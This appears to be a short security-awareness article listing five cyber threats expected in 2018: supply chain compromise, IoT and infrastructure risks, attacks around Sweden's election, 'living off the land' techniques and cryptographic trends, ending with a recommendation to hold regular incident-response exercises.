Five Cyber threats you should look out for 2018
Attacks on supply chains
In 2017 we saw most vendors getting hacked, with legitimate code changed to contain backdoors or other types of unwanted behaviour. In several cases, the modified code was even cryptographically signed with the company’s certificate.
This type of attack where dependencies on our suppliers are exploited is probably just the tip of the iceberg. CloudHopper was not particularly advanced but it was effective in exploiting people by getting administrators to click on attachments containing malicious code.
When did you last look to see whether your computer or server might contain a hardware backdoor put there during delivery from the manufacturer? Are binaries automatically updated from your provider?
2. IoT - connected devices and critical infrastructure
As digitalisation spreads and more and more products and systems are connected, the ability of a malicious operator to influence these connected devices is also increasing. This can range from a connected refrigerator to critical systems that can be indirectly affected by cyber attacks against locks, electrical supplies, telephony etc.
3. The election
Most people will be aware that there is a general election in Sweden this year. With more and more alternative news sources and ‘fake news’, cyber attacks will be one of several channels for reinforcing a narrative. We will probably see information thefts where the content can be used to strengthen or weaken a party at a strategic time.
4. ‘Living off the land’
Why should the attacker introduce new binaries or malware into a system when it is possible to exploit existing functionality to create backdoors or e.g. filter information? ‘Living off the land’ is a concept whereby the attacker can use things that are already installed in the basic Windows system. As more and more users use whitelisting, this becomes a way for the attacker to bypass the whitelists and avoid triggering antivirus software.
Within the crypto area, we will see an increase in systems utilising encryption and end-to-end processes. But attackers too are getting better at exploiting cryptographic functions and making it harder for us to investigate malware.
With homomorphic systems such as attribute-based encryption and searchable encryption, storing information in cloud services will be more secure without the cloud service provider being able to view the content.
Organisations need to get better at practising and displaying risk-awareness. This applies not only to management teams but to the entire organisation. What do you do when the ‘shit hits the fan’ (if you’ll pardon the expression). Not only because you have to have an action plan for the GDPR, NIS and other laws that are coming, but because it is only a matter of time before something happens and you are forced to act. So make it easier for yourself - allocate one day per year for different types of exercise.